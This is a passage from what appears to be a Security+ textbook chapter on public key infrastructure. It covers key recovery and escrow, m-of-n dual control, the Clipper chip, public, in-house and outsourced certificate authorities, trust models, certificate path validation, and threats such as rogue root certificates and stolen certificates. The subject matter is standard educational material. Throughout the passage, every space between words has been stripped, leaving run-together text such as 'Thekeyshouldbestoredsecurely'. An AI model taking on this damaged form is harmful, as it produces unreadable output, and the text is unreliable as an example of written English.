Thekeyshouldbestoredsecurely.
Authenticationshouldberequiredbeforethekeycanbeused.
Thekeyshouldbetransportedsecurely.
Softwareimplementationsthatstoreandusethekeyshouldbeevaluatedtoensuretheyprovidethenecessarylevelofprotection.
Ifdigitalsignatureswillbeusedforlegalpurposes,thesepointsandothersmayneedtobeauditedtoensurethattrueauthenticityandnonrepudiationareprovided.
Themostsensitiveandcriticalpublic/privatekeypairsarethoseusedbyCAstodigitallysigncertificates.Theseneedtobehighlyprotectedbecauseiftheywereevercompromised,thetrustrelationshipbetweentheCAandalloftheend-entitieswouldbethreatened.Inhigh-securityenvironments,thesekeysareoftenkeptinatamper-proofhardwareencryptionstore,suchasanHSM,andareaccessibleonlytoindividualswithaneedtoknow.
KeyRecovery
Oneindividualcouldhaveone,two,ormanykeypairsthataretiedtohisorheridentity.Thatisbecauseusersmayhavedifferentneedsandrequirementsforpublic/privatekeypairs.Asmentionedearlier,certificatescanhavespecificattributesandusagerequirementsdictatinghowtheircorrespondingkeyscanandcannotbeused.Forexample,Davidcanhaveonekeypairheusestoencryptandtransmitsymmetrickeys,anotherkeypairthatallowshimtoencryptdata,andyetanotherkeypairtoperformdigitalsignatures.Davidcanalsohaveadigitalsignaturekeypairforhiswork-relatedactivitiesandanotherkeypairforpersonalactivities,suchase-mailinghisfriends.Thesekeypairsneedtobeusedonlyfortheirintendedpurposes,andthisisenforcedthroughcertificateattributesandusagevalues.Ifacompanyisgoingtoperformkeyrecoveryandmaintainakey
recoverysystem,itwillgenerallybackuponlythekeypairusedtoencryptdata,notthekeypairsthatareusedtogeneratedigitalsignatures.Thereasonthatacompanyarchiveskeysistoensurethatifapersonleavesthecompany,fallsoffacliff,orforsomereasonisunavailabletodecryptimportantcompanyinformation,thecompanycanstillgettoitscompany-owneddata.Thisisjustamatteroftheorganizationprotectingitself.Acompanywouldnotneedtobeabletorecoverakeypairthatisusedfordigitalsignatures,sincethosekeysaretobeusedonlytoprovetheauthenticityoftheindividualwhosentamessage.Acompanywouldnotbenefitfromhavingaccesstothosekeysandreallyshouldnothaveaccesstothem,sincetheyaretiedtooneindividualforaspecificpurpose.Twosystemsareimportantforbackingupandrestoringcryptographic
keys:keyarchivingandkeyrecovery.Keyarchivingisawayofbackingupkeysandsecurelystoringtheminarepository;keyrecoveryistheprocessofrestoringlostkeystotheusersorthecompany.
ExamTip:Keyarchivingistheprocessofstoringasetofkeystobeusedasabackupshouldsomethinghappentotheoriginalset.Keyrecoveryistheprocessofusingthebackupkeys.
Ifkeysarebackedupandstoredinacentralizedcomputer,thissystemmustbetightlycontrolled,becauseifitwerecompromised,anattackerwouldhaveaccesstoallkeysfortheentireinfrastructure.Also,itisusuallyunwisetoauthorizeasinglepersontobeabletorecoverallthekeyswithintheenvironment,becausethatpersoncouldusethispowerforevilpurposesinsteadofjustrecoveringkeyswhentheyareneededforlegitimatepurposes.Insecuritysystems,itisbestnottofullytrustanyone.Dualcontrolcanbeusedaspartofasystemtobackupandarchivedata
encryptionkeys.PKIsystemscanbeconfiguredtorequiremultipleindividualstobeinvolvedinanykeyrecoveryprocess.Whenakeyrecoveryisrequired,atleasttwopeoplecanberequiredtoauthenticatebythekeyrecoverysoftwarebeforetherecoveryprocedureisperformed.Thisenforcesseparationofduties,whichmeansthatonepersoncannotcompleteacriticaltaskbyhimself.Requiringtwoindividualstorecoveralostkeytogetheriscalleddualcontrol,whichsimplymeansthattwopeoplehavetobepresenttocarryoutaspecifictask.
TechTip
KeysplittingSecretsplittingusingmofnauthenticationschemescanimprovesecuritybyrequiringthatmultiplepeopleperformcriticalfunctions,preventingasinglepartyfromcompromisingasecret.BesuretounderstandtheconceptofmofnfortheCompTIASecurity+exam.
Thisapproachtokeyrecoveryisreferredtoasthemofnauthentication,wherennumberofpeoplecanbeinvolvedinthekeyrecoveryprocess,butatleastm(whichisasmallernumberthann)mustbeinvolvedbeforethetaskcanbecompleted.Thegoalistominimizefraudulentorimproperuseofaccessandpermissions.Acompanywouldnotrequireallpossibleindividualstobeinvolvedintherecoveryprocess,becausegettingallthepeopletogetheratthesametimecouldbeimpossibleconsideringmeetings,vacations,sicktime,andtravel.Atleastsomeofallpossible
individualsmustbeavailabletoparticipate,andthisisthesubsetmofthenumbern.Thisformofsecretsplittingcanincreasesecuritybyrequiringmultiplepeopletoperformaspecificfunction.Requiringtoomanypeopleforthemsubsetincreasesissuesassociatedwithavailability,whereasrequiringtoofewincreasestheriskofasmallnumberofpeoplecolludingtocompromiseasecret.
ExamTip:Recoveryagentisthetermforanentitythatisgivenapublickeycertificateforrecoveringuserdatathatisencrypted.ThisisthemostcommontypeofrecoverypolicyusedinPKIbutaddstheriskoftherecoveryagenthavingaccesstosecuredinformation.
Allkeyrecoveryproceduresshouldbehighlyaudited.Theauditlogsshouldcaptureatleastwhatkeyswererecovered,whowasinvolvedintheprocess,andthetimeanddate.KeysareanintegralpieceofanyencryptioncryptosystemandarecriticaltoaPKIenvironment,soyouneedtotrackwhodoeswhatwiththem.
KeyEscrowKeyrecoveryandkeyescrowaretermsthatareoftenusedinterchangeably,buttheyactuallydescribetwodifferentthings.Youshouldnotusetheminterchangeablyafteryouhavereadthissection.
ExamTip:Keyrecoveryisaprocessthatallowsforlostkeystoberecovered.Keyescrowisaprocessofgivingkeystoathirdpartysothattheycandecryptandreadsensitiveinformationwhenthisneedarises.
Keyescrowistheprocessofgivingkeystoathirdpartysothattheycandecryptandreadsensitiveinformationiftheneedarises.Keyescrow
almostalwayspertainstohandingoverencryptionkeystothegovernment,ortoanotherhigherauthority,sothatthekeyscanbeusedtocollectevidenceduringinvestigations.Akeypairusedinaperson’splaceofworkmayberequiredtobeescrowedbytheemployerfortworeasons.First,thekeysarepropertyoftheenterprise,issuedtotheworkerforuse.Second,thefirmmayhaveneedforthemafteranemployeeleavesthefirm.
ExamTip:Keyescrow,allowinganothertrustedpartytoholdacopyofakey,haslongbeenacontroversialtopic.Thisessentialbusinessprocessprovidescontinuityshouldtheauthorizedkey-holdingpartyleaveanorganizationwithoutdisclosingkeys.Thesecurityoftheescrowedkeyisaconcern,anditneedstobemanagedatthesamesecuritylevelasfortheoriginalkey.
Severalmovements,supportedbypartsoftheU.S.government,wouldrequireallormanypeopleresidingintheUnitedStatestohandovercopiesofthekeystheyusetoencryptcommunicationchannels.Themovementinthelate1990sbehindtheClipperchipisthemostwell-knownefforttoimplementthisrequirementandprocedure.ItwassuggestedthatallAmerican-madecommunicationdevicesshouldhaveahardwareencryptionchipwithinthem.Thechipcouldbeusedtoencryptdatagoingbackandforthbetweentwoindividuals,butifagovernmentagencydecidedthatitshouldbeabletoeavesdroponthisdialog,itwouldjustneedtoobtainacourtorder.Ifthecourtorderwasapproved,alawenforcementagentwouldtaketheordertotwoescrowagencies,eachofwhichwouldhaveapieceofthekeythatwasnecessarytodecryptthiscommunicationinformation.Theagentwouldobtainbothpiecesofthekeyandcombinethem,whichwouldallowtheagenttolisteninontheencryptedcommunicationoutlinedinthecourtorder.TheClipperchipstandardneversawthelightofdaybecauseitseemed
too“BigBrother”tomanyAmericancitizens.Buttheideawasthattheencryptionkeyswouldbeescrowedtotwoagencies,meaningthateachagencywouldholdonepieceofthekey.Oneagencycouldnotholdthe
wholekey,becauseitcouldthenusethiskeytowiretappeople’sconversationsillegally.Splittingupthekeyisanexampleofseparationofduties,putintoplacetotryandpreventfraudulentactivities.ThecurrentissueofgovernmentsdemandingaccesstokeystodecryptinformationiscoveredinChapter24.
PublicCertificateAuthoritiesAnindividualorcompanymaydecidetorelyonaCAthatisalreadyestablishedandbeingusedbymanyotherindividualsandcompanies—apublicCA.Acompany,ontheotherhand,maydecidethatitneedsitsownCAforinternaluse,whichgivesthecompanymorecontroloverthecertificateregistrationandgenerationprocessandallowsittoconfigureitemsspecificallyforitsownneeds.ThissecondtypeofCAisreferredtoasaprivateCA(orin-houseCA),discussedinthenextsection.ApublicCAspecializesinverifyingindividualidentitiesandcreating
andmaintainingtheircertificates.Thesecompaniesissuecertificatesthatarenotboundtospecificcompaniesorintracompanydepartments.Instead,theirservicesaretobeusedbyalargerandmorediversifiedgroupofpeopleandorganizations.IfacompanyusesapublicCA,thecompanywillpaytheCAorganizationforindividualcertificatesandfortheserviceofmaintainingthesecertificates.SomeexamplesofpublicCAsareVeriSign(includingGeoTrustandThawte),Entrust,andGoDaddy.
UserscanremoveCAsfromtheirbrowserlistiftheywanttohavemorecontroloverwhotheirsystemtrustsandwhoitdoesn’t.Unfortunately,systemupdatescanrestorethem,requiringregularcertificatestoremaintenance.
OneadvantageofusingapublicCAisthatitisusuallywellknownandeasilyaccessibletomanypeople.MostwebbrowsershavealistofpublicCAsinstalledandconfiguredbydefault,alongwiththeircorresponding
rootcertificates.Thismeansthatifyouinstallawebbrowseronyourcomputer,itisalreadyconfiguredtotrustcertainCAs,eventhoughyoumighthaveneverheardofthembefore.So,ifyoureceiveacertificatefromBob,andhiscertificatewasdigitallysignedbyaCAlistedinyourbrowser,youautomaticallytrusttheCAandcaneasilywalkthroughtheprocessofverifyingBob’scertificate.Thishasraisedsomeeyebrowsamongsecurityprofessionals,however,sincetrustisinstalledbydefault,buttheindustryhasdeemedthisisanecessaryapproachthatprovidesuserswithtransparencyandincreasedfunctionality.Earlierinthechapter,thedifferentcertificateclassesandtheiruseswere
explained.Noglobalstandarddefinestheseclasses,theexactrequirementsforobtainingthesedifferentcertificates,ortheiruses.Standardsareinplace,usuallyforaparticularcountryorindustry,butthismeansthatpublicCAscandefinetheirowncertificateclassifications.ThisisnotnecessarilyagoodthingforcompaniesthatdependonpublicCAs,becauseitdoesnotprovidetothecompanyenoughcontroloverhowitshouldinterpretcertificateclassificationsandhowtheyshouldbeused.Thismeansanothercomponentneedstobecarefullydevelopedfor
companiesthatuseanddependonpublicCAs,andthiscomponentisreferredtoasthecertificatepolicy(CP).Thispolicyallowsthecompanytodecidewhatcertificationclassesareacceptableandhowtheywillbeusedwithintheorganization.ThisisdifferentfromtheCPS,whichexplainshowtheCAverifiesentities,generatescertificates,andmaintainsthesecertificates.TheCPisgeneratedandownedbyanindividualcompanythatusesanexternalCA,anditallowsthecompanytoenforceitssecuritydecisionsandcontrolhowcertificatesareusedwithitsapplications.
In-HouseCertificateAuthoritiesAnin-houseCAisimplemented,maintained,andcontrolledbythecompanythatimplementedit.ThistypeofCAcanbeusedtocreatecertificatesforinternalemployees,devices,applications,partners,and
customers.Thisapproachgivesthecompanycompletecontroloverhowindividualsareidentified,whatcertificationclassificationsarecreated,whocanandcannothaveaccesstotheCA,andhowthecertificationscanbeused.
TechTip
WhyIn-HouseCAs?In-houseCAsprovidemoreflexibilityforcompanies,whichoftenintegratethemintocurrentinfrastructuresandintoapplicationsforauthentication,encryption,andnonrepudiationpurposes.IftheCAisgoingtobeusedoveranextendedperiodoftime,thiscanbeacheapermethodofgeneratingandusingcertificatesthanhavingtopurchasethemthroughapublicCA.Settingupin-housecertificateserversisrelativelyeasyandcanbedonewithsimplesoftwarethattargetsbothWindowsandLinuxservers.
ChoosingBetweenaPublicCAandanIn-HouseCAWhendecidingbetweenanin-houseandpublicCA,variousfactorsneedtobeidentifiedandaccountedfor.Manycompanieshaveembarkeduponimplementinganin-housePKIenvironmentwitharoughestimatethatwouldbeimplementedwithinxnumberofmonthsandwouldcostapproximatelyyamountindollars.Withoutdoingtheproperhomework,companiesmightnotunderstandthecurrentenvironment,mightnotcompletelyhammerouttheintendedpurposeofthePKI,andmightnothaveenoughskilledstaffsupportingtheproject;timeestimatescandoubleortripleandtherequiredfundsandresourcescanbecomeunacceptable.SeveralcompanieshavestartedonaPKIimplementation,onlytoquithalfwaythrough,resultinginwastedtimeandmoney,withnothingtoshowforitexceptheapsoffrustrationandmanyulcers.Insomesituations,itisbetterforacompanytouseapublicCA,since
publicCAsalreadyhavethenecessaryequipment,skills,andtechnologies.
Inothersituations,companiesmaydecideitisabetterbusinessdecisiontotakeontheseeffortsthemselves.Thisisnotalwaysastrictlymonetarydecision—aspecificlevelofsecuritymightberequired.Somecompaniesdonotbelievethattheycantrustanoutsideauthoritytogenerateandmaintaintheirusers’andcompany’scertificates.Inthissituation,thescalemaytiptowardanin-houseCA.
Certificateauthoritiescomeinmanytypes:public,in-house,andoutsourced.Allofthemperformthesamefunctions,withtheonlydifferencebeinganorganizationalone.Thiscanhaveabearingontrustrelationships,asoneismorelikelytotrustin-houseCAsoverothersforwhichthereisarguablylesscontrol.
Eachcompanyisunique,withvariousgoals,securityrequirements,functionalityneeds,budgetaryrestraints,andideologies.ThedecisionofwhethertouseaprivateCAoranin-houseCAdependsontheexpansivenessofthePKIwithintheorganization,howintegrateditwillbewithdifferentbusinessneedsandgoals,itsinteroperabilitywithacompany’scurrenttechnologies,thenumberofindividualswhowillbeparticipating,andhowitwillworkwithoutsideentities.Thiscouldbequitealargeundertakingthattiesupstaff,resources,andfunds,soalotofstrategicplanningisrequired,andwhatwillandwon’tbegainedfromaPKIshouldbefullyunderstoodbeforethefirstdollarisspentontheimplementation.
OutsourcedCertificateAuthoritiesThelastavailableoptionforusingPKIcomponentswithinacompanyistooutsourcedifferentpartsofittoaspecificserviceprovider.Usually,themorecomplexpartsareoutsourced,suchastheCA,RA,CRL,andkeyrecoverymechanisms.ThisoccursifacompanydoesnothavethenecessaryskillstoimplementandcarryoutafullPKIenvironment.
TechTip
OutsourcedCAvs.PublicCAAnoutsourcedCAisdifferentfromapublicCAinthatitprovidesdedicatedservices,andpossiblyequipment,toanindividualcompany.ApublicCA,incontrast,canbeusedbyhundredsorthousandsofcompanies—theCAdoesn’tmaintainspecificserversandinfrastructuresforindividualcompanies.
Althoughoutsourcedservicesmightbeeasierforyourcompanytoimplement,youneedtoreviewseveralfactorsbeforemakingthistypeofcommitment.Youneedtodeterminewhatleveloftrustthecompanyiswillingtogivetotheserviceproviderandwhatlevelofriskitiswillingtoaccept.OftenaPKIanditscomponentsserveaslargesecuritycomponentswithinacompany’senterprise,andallowingathirdpartytomaintainthePKIcanintroducetoomanyrisksandliabilitiesthatyourcompanyisnotwillingtoundertake.Theliabilitiestheserviceprovideriswillingtoaccept,thesecurityprecautionsandprocedurestheoutsourcedCAsprovide,andthesurroundinglegalissuesneedtobeexaminedbeforethistypeofagreementismade.SomelargeverticalmarketshavetheirownoutsourcedPKI
environmentssetupbecausetheysharesimilarneedsandusuallyhavethesamerequirementsforcertificationtypesanduses.Thisallowsseveralcompanieswithinthesamemarkettosplitthecostsofthenecessaryequipment,anditallowsforindustry-specificstandardstobedrawnupandfollowed.Forexample,althoughmanymedicalfacilitiesworkdifferentlyandhavedifferentenvironments,theyhavealotofthesamefunctionalityandsecurityneeds.Ifseveralofthemcametogether,purchasedthenecessaryequipmenttoprovideCA,RA,andCRLfunctionality,employedonepersontomaintainit,andtheneachconnecteditsdifferentsitestothecentralizedcomponents,themedicalfacilitiescouldsavealotofmoneyandresources.Inthiscase,noteveryfacilitywouldneedtostrategicallyplanitsownfullPKI,andeachwouldnotneed
topurchaseredundantequipmentoremployredundantstaffmembers.Figure6.10illustrateshowoneoutsourcedserviceprovidercanofferdifferentPKIcomponentsandservicestodifferentcompanies,andhowcompanieswithinoneverticalmarketcansharethesameresources.
•Figure6.10APKIserviceprovider(representedbythefourboxes)canofferdifferentPKIcomponentstocompanies.
AsetofstandardscanbedrawnupabouthoweachdifferentfacilityshouldintegrateitsowninfrastructureandhowitshouldintegratewiththecentralizedPKIcomponents.Thisalsoallowsforless-complicatedintercommunicationtotakeplacebetweenthedifferentmedicalfacilities,whichwilleaseinformation-sharingattempts.
TyingDifferentPKIsTogetherInsomecases,morethanoneCAmaybeneededforaspecificPKItoworkproperly,andseveralrequirementsmustbemetfordifferentPKIstointercommunicate.Herearesomeexamples:
Acompanywantstobeabletocommunicateseamlesslywithitssuppliers,customers,orbusinesspartnersviaaPKI.
OnedepartmentwithinacompanyhashighersecurityrequirementsthanallotherdepartmentsandthusneedstoconfigureandcontrolitsownCA.
Onedepartmentneedstohavespeciallyconstructedcertificateswithuniquefieldsandusages.
DifferentpartsofanorganizationwanttocontroltheirownpiecesofthenetworkandtheCAthatisencompassedwithinit.
ThenumberofcertificatesthatneedtobegeneratedandmaintainedwouldoverwhelmoneCA,somultipleCAsmustbedeployed.
Thepoliticalcultureofacompanyinhibitsonedepartmentfrombeingabletocontrolelementsofanotherdepartment.
Enterprisesarepartitionedgeographically,anddifferentsitesneedtheirownlocalCA.
Thesesituationscanaddmuchmorecomplexitytotheoverallinfrastructure,intercommunicationcapabilities,andproceduresforcertificategenerationandvalidation.Tocontrolthiscomplexityproperlyfromthebeginning,theserequirementsneedtobeunderstood,addressed,andplannedfor.Thenthenecessarytrustmodelneedstobechosenandmoldedforthecompanytobuildupon.Selectingtherighttrustmodelwillgivethecompanyasolidfoundationfromthebeginning,insteadoftryingtoaddstructuretoaninaccurateandinadequateplanlateron.
TrustModelsPotentialscenariosexistotherthanjusthavingmorethanoneCA—eachofthecompaniesoreachdepartmentofanenterprisecanactuallyrepresentatrustdomainitself.Atrustdomainisaconstructofsystems,personnel,applications,protocols,technologies,andpoliciesthatworktogethertoprovideacertainlevelofprotection.Allofthesecomponentscanworktogetherseamlesslywithinthesametrustdomainbecausetheyareknowntotheothercomponentswithinthedomainandaretrustedtosomedegree.Differenttrustdomainsareusuallymanagedbydifferentgroupsofadministrators,havedifferentsecuritypolicies,andrestrictoutsidersfromprivilegedaccess.
TechTip
TrustModelsThereareseveralformsoftrustmodelsassociatedwithcertificates.Hierarchical,peer-to-peer,andhybridaretheprimaryforms,withtheweboftrustbeingaformofhybrid.EachofthesemodelshasausefulplaceinthePKIarchitectureunderdifferentcircumstances.
Mosttrustdomains(whetherindividualcompaniesordepartments)usuallyarenotislandscutofffromtheworld—theyneedtocommunicatewithother,less-trusteddomains.Thetrickistofigureouthowmuchtwo
differentdomainsshouldtrusteachother,andhowtoimplementandconfigureaninfrastructurethatwouldallowthesetwodomainstocommunicateinawaythatwillnotallowsecuritycompromisesorbreaches.Thiscanbemoredifficultthanitsounds.Inthenondigitalworld,itisdifficulttofigureoutwhototrust,howto
carryoutlegitimatebusinessfunctions,andhowtoensurethatoneisnotbeingtakenadvantageoforliedto.Jumpintothedigitalworldandaddprotocols,services,encryption,CAs,RAs,CRLs,anddifferingtechnologiesandapplications,andthebusinessriskscanbecomeoverwhelmingandconfusing.Sostartwithabasicquestion:Whatcriteriawillweusetodeterminewhowetrustandtowhatdegree?Oneexampleoftrustconsideredearlierinthechapteristhedriver’s
licenseissuedbytheDMV.Suppose,forexample,thatBobisbuyingalampfromCarolandhewantstopaybycheck.SinceCaroldoesnotknowBob,shedoesnotknowifshecantrusthimorhavemuchfaithinhischeck.ButifBobshowsCarolhisdriver’slicense,shecancomparethenametowhatappearsonthecheck,andshecanchoosetoacceptit.Thetrustanchor(theagreed-upontrustedthirdparty)inthisscenarioistheDMV,sincebothCarolandBobtrustitmorethantheytrusteachother.BobhadtoprovidedocumentationtotheDMVtoprovehisidentity,thatorganizationtrustedhimenoughtogeneratealicense,andCaroltruststheDMV,soshedecidestotrustBob’scheck.Consideranotherexampleofatrustanchor.IfJoeandStacyneedto
communicatethroughe-mailandwouldliketouseencryptionanddigitalsignatures,theywillnottrusteachother’scertificatealone.Butwheneachreceivestheother’scertificateandseesthatithasbeendigitallysignedbyanentitytheybothdotrust—theCA—theyhaveadeeperleveloftrustineachother.ThetrustanchorhereistheCA.Thisiseasyenough,butwhenweneedtoestablishtrustanchorsbetweendifferentCAsandPKIenvironments,itgetsalittlemorecomplicated.IftwocompaniesneedtocommunicateusingtheirindividualPKIs,orif
twodepartmentswithinthesamecompanyusedifferentCAs,twoseparatetrustdomainsareinvolved.Theusersanddevicesfromthesedifferent
trustdomainsneedtocommunicatewitheachother,andtheyneedtoexchangecertificatesandpublickeys,whichmeansthattrustanchorsneedtobeidentifiedandacommunicationchannelmustbeconstructedandmaintained.Atrustrelationshipmustbeestablishedbetweentwoissuingauthorities
(CAs).ThishappenswhenoneorbothoftheCAsissueacertificatefortheotherCA’spublickey,asshowninFigure6.11.ThismeansthateachCAregistersforacertificateandpublickeyfromtheotherCA.EachCAvalidatestheotherCA’sidentificationinformationandgeneratesacertificatecontainingapublickeyforthatCAtouse.Thisestablishesatrustpathbetweenthetwoentitiesthatcanthenbeusedwhenusersneedtoverifyotherusers’certificatesthatfallwithinthedifferenttrustdomains.Thetrustpathcanbeunidirectionalorbidirectional,soeitherthetwoCAstrusteachother(bidirectional)oronlyonetruststheother(unidirectional).
•Figure6.11Atrustrelationshipcanbebuiltbetweentwotrustdomainstosetupacommunicationchannel.
ExamTip:ThreeformsoftrustmodelsarecommonlyfoundinPKIs:
•Hierarchical•Peer-to-peer•Hybrid
AsillustratedinFigure6.11,alltheusersanddevicesintrustdomain1trusttheirownCA,CA1,whichistheirtrustanchor.Allusersanddevicesintrustdomain2havetheirowntrustanchor,CA2.ThetwoCAshaveexchangedcertificatesandtrusteachother,buttheydonothaveacommontrustanchorbetweenthem.Thetrustmodelsdescribeandoutlinethetrustrelationshipsbetweenthe
differentCAsanddifferentenvironments,whichwillindicatewherethetrustpathsreside.Thetrustmodelsandpathsneedtobethoughtoutbeforeimplementationtorestrictandcontrolaccessproperlyandtoensurethatasfewtrustpathsaspossibleareused.Severaldifferenttrustmodelscanbeused:thehierarchical,peer-to-peer,andhybridmodelsarediscussedinthefollowingsections.
HierarchicalTrustModelThehierarchicaltrustmodelisabasichierarchicalstructurethatcontainsarootCA,intermediateCAs,leafCAs,andend-entities.Theconfigurationisthatofaninvertedtree,asshowninFigure6.12.TherootCAistheultimatetrustanchorforallotherentitiesinthisinfrastructure,anditgeneratescertificatesfortheintermediateCAs,whichinturngeneratecertificatesfortheleafCAs,andtheleafCAsgeneratecertificatesfortheend-entities(users,networkdevices,andapplications).
•Figure6.12Thehierarchicaltrustmodeloutlinestrustpaths.
IntermediateCAsfunctiontotransfertrustbetweendifferentCAs.TheseCAsarereferredtoassubordinateCAsbecausetheyaresubordinatetotheCAthattheyreference.ThepathoftrustiswalkedupfromthesubordinateCAtothehigher-levelCA;inessencethesubordinateCAisusingthehigher-levelCAasareference.AsshowninFigure6.12,nobidirectionaltrustsexist—theyareall
unidirectionaltrusts,asindicatedbytheone-wayarrows.Sincenoother
entitycancertifyandgeneratecertificatesfortherootCA,itcreatesaself-signedcertificate.Thismeansthatthecertificate’sIssuerandSubjectfieldsholdthesameinformation,bothrepresentingtherootCA,andtherootCA’spublickeywillbeusedtoverifythiscertificatewhenthattimecomes.ThisrootCAcertificateandpublickeyaredistributedtoallentitieswithinthistrustmodel.
TechTip
RootCAIftherootCA’sprivatekeywereevercompromised,allentitieswithinthehierarchicaltrustmodelwouldbedrasticallyaffected,becausethisistheirsoletrustanchor.TherootCAusuallyhasasmallamountofinteractionwiththeintermediateCAsandend-entities,andcanthereforebetakenofflinemuchofthetime.ThisprovidesagreaterdegreeofprotectionfortherootCA,becausewhenitisofflineitisbasicallyinaccessible.
WalkingtheCertificatePathWhenauserinonetrustdomainneedstocommunicatewithauserinanothertrustdomain,oneuserwillneedtovalidatetheother’scertificate.Thissoundssimpleenough,butwhatitreallymeansisthateachcertificateforeachCA,allthewayuptoasharedtrustedanchor,alsomustbevalidated.IfDebbieneedstovalidateSam’scertificate,asshowninFigure6.12,sheactuallyalsoneedstovalidatetheLeafDCAandIntermediateBCAcertificates,aswellasSam’s.SoinFigure6.12,wehaveauser,Sam,whodigitallysignsamessage
andsendsitandhiscertificatetoDebbie.DebbieneedstovalidatethiscertificatebeforeshecantrustSam’sdigitalsignature.IncludedinSam’scertificateisanIssuerfield,whichindicatesthatthecertificatewasissuedbyLeafDCA.DebbiehastoobtainLeafDCA’sdigitalcertificateandpublickeytovalidateSam’scertificate.RememberthatDebbievalidatesthecertificatebyverifyingitsdigitalsignature.Thedigitalsignaturewascreatedbythecertificateissuerusingitsprivatekey,soDebbieneedsto
verifythesignatureusingtheissuer’spublickey.DebbietracksdownLeafDCA’scertificateandpublickey,butshe
nowneedstoverifythisCA’scertificate,soshelooksattheIssuerfield,whichindicatesthatLeafDCA’scertificatewasissuedbyIntermediateBCA.DebbienowneedstogetIntermediateBCA’scertificateandpublickey.Debbie’sclientsoftwaretracksthisdownandseesthattheissuerfor
IntermediateBCAistherootCA,forwhichshealreadyhasacertificateandpublickey.SoDebbie’sclientsoftwarehadtofollowthecertificatepath,meaningithadtocontinuetotrackdownandcollectcertificatesuntilitcameuponaself-signedcertificate.Aself-signedcertificateindicatesthatitwassignedbyarootCA,andDebbie’ssoftwarehasbeenconfiguredtotrustthisentityashertrustanchor,soshecanstopthere.Figure6.13illustratesthestepsDebbie’ssoftwarehadtocarryoutjusttobeabletoverifySam’scertificate.
•Figure6.13Verifyingeachcertificateinacertificatepath
Thistypeofsimplistictrustmodelworkswellwithinanenterprisethateasilyfollowsahierarchicalorganizationalchart,butmanycompaniescannotusethistypeoftrustmodelbecausedifferentdepartmentsorofficesrequiretheirowntrustanchors.Thesedemandscanbederivedfromdirectbusinessneedsorfrominterorganizationalpolitics.Thishierarchicalmodelmightnotbepossiblewhentwoormorecompaniesneedtocommunicatewitheachother.Neithercompanywilllettheother’sCAbetherootCA,becauseeachdoesnotnecessarilytrusttheotherentitytothatdegree.Inthesesituations,theCAswillneedtoworkinapeer-to-peerrelationshipinsteadofinahierarchicalrelationship.
Peer-to-PeerModel
Inapeer-to-peertrustmodel,oneCAisnotsubordinatetoanotherCA,andnoestablishedtrustedanchorbetweentheCAsisinvolved.Theend-entitieswilllooktotheirissuingCAastheirtrustedanchor,butthedifferentCAswillnothaveacommonanchor.Figure6.14illustratesthistypeoftrustmodel.ThetwodifferentCAs
willcertifythepublickeyforeachother,whichcreatesabidirectionaltrust.Thisisreferredtoascross-certification,sincetheCAsarenotreceivingtheircertificatesandpublickeysfromasuperiorCA,butinsteadarecreatingthemforeachother.
•Figure6.14Cross-certificationcreatesapeer-to-peerPKImodel.
Oneofthemaindrawbackstothismodelisscalability.EachCAmustcertifyeveryotherCAthatisparticipating,andabidirectionaltrustpathmustbeimplemented,asshowninFigure6.15.IfonerootCAwerecertifyingalltheintermediateCAs,scalabilitywouldnotbeasmuchofanissue.
•Figure6.15Scalabilityisadrawbackincross-certificationmodels.
Figure6.15representsafullyconnectedmesharchitecture,meaningthateachCAisdirectlyconnectedtoandhasabidirectionaltrustrelationshipwitheveryotherCA.Asyoucanseeinthisillustration,thecomplexityofthissetupcanbecomeoverwhelming.
Inanynetworkmodel,fullyconnectedmesharchitecturesarewastefulandexpensive.Intrusttransfermodels,theextralevelofredundancyisjustthat:redundantandunnecessary.
HybridTrustModel
Acompanycanbeinternallycomplex,andwhentheneedarisestocommunicateproperlywithoutsidepartners,suppliers,andcustomersinanauthorizedandsecuredmanner,thiscomplexitycanmakestickingtoeitherthehierarchicalorpeer-to-peertrustmodeldifficult,ifnotimpossible.Inmanyimplementations,thedifferentmodeltypeshavetobecombinedtoprovidethenecessarycommunicationlinesandlevelsoftrust.Inahybridtrustmodel,thetwocompanieshavetheirowninternalhierarchicalmodelsandareconnectedthroughapeer-to-peermodelusingcross-certification.AnotheroptioninthishybridconfigurationistoimplementabridgeCA.
Figure6.16illustratestherolethatabridgeCAcouldplay—itisresponsibleforissuingcross-certificatesforallconnectedCAsandtrustdomains.Thebridgeisnotconsideredarootortrustanchor,butmerelytheentitythatgeneratesandmaintainsthecross-certificationfortheconnectedenvironments.
•Figure6.16AbridgeCAcancontrolthecross-certificationprocedures.
ExamTip:Threetrustmodelsexist:hierarchical,peer-to-peer,andhybrid.Hierarchicaltrustislikeanupside-downtree,peer-to-peerisalateralseriesofreferences,andhybridisacombinationofhierarchicalandpeer-to-peertrust.
Certificate-BasedThreatsAlthoughcertificatesbringmuchcapabilitytosecuritythroughpracticalmanagementoftrust,theyalsocanpresentthreats.Becausemuchoftheactualworkisdonebehindthescenes,withoutdirectuserinvolvement,afalsesenseofsecuritymightensue.EndusersmightassumethatifanHTTPSconnectionwasmadewithaserver,theyaresecurelyconnectedtotheproperserver.Spoofing,phishing,pharming,andawiderangeofsophisticatedattackspreyonthisassumption.Today,industryhasrespondedwithahigh-assurancecertificatethatissignedandrecognizedbybrowsers.Usingthisexample,wecanexaminehowanattackermightpreyonauser’strustinsoftwaregettingthingscorrect.Ifahackerwishestohavesomethingrecognizedaslegitimate,hemay
havetoobtainacertificatethatprovesthispointtotheend-usermachine.Oneavenuewouldbetoforgeafalsecertificate,butthisischallengingbecauseofthepublickeysigningofcertificatesbyCAs.Toovercomethisproblem,thehackerneedstoinstallafalse,self-signedrootcertificateontheend-userPC.Thisfalsekeycanthenbeusedtovalidatemalicioussoftwareascomingfromatrustedsource.Thisattackpreysonthefactthatendusersdonotknowthecontentsoftheirrootcertificatestore,nordotheyhaveameanstovalidatechanges.Inanenterpriseenvironment,thisattackcanbethwartedbylockingdownthecertificatestoreandvalidatingchangesagainstawhitelist.Thisoptionreallyisnotverypracticalforendusersoutsideofanenterprise.
StolenCertificatesCertificatesactasaformoftrustedIDandaretypicallyhandledwithoutend-userintervention.Toensuretheveracityofacertificate,aseriesofcryptographiccontrolsisemployed,includingdigitalsignaturestoprovideproofofauthenticity.Thisstatementaside,stolencertificateshavebeenusedinmultiplecasesofcomputerintrusions/systemattacks.Speciallycraftedmalwarehasbeendesignedtostealbothprivatekeysanddigitalcertificatesfrommachines.Oneofthemostinfamousmalwareprograms,theZeusbot,hasfunctionalitytoperformthistask.
Astolencertificateand/orprivatekeycanbeusedtobypassmanysecuritymeasures.ConcernoverstolenSSL/TLScredentialsledtothecreationofhigh-assurancecertificates,whicharediscussedinChapter17.
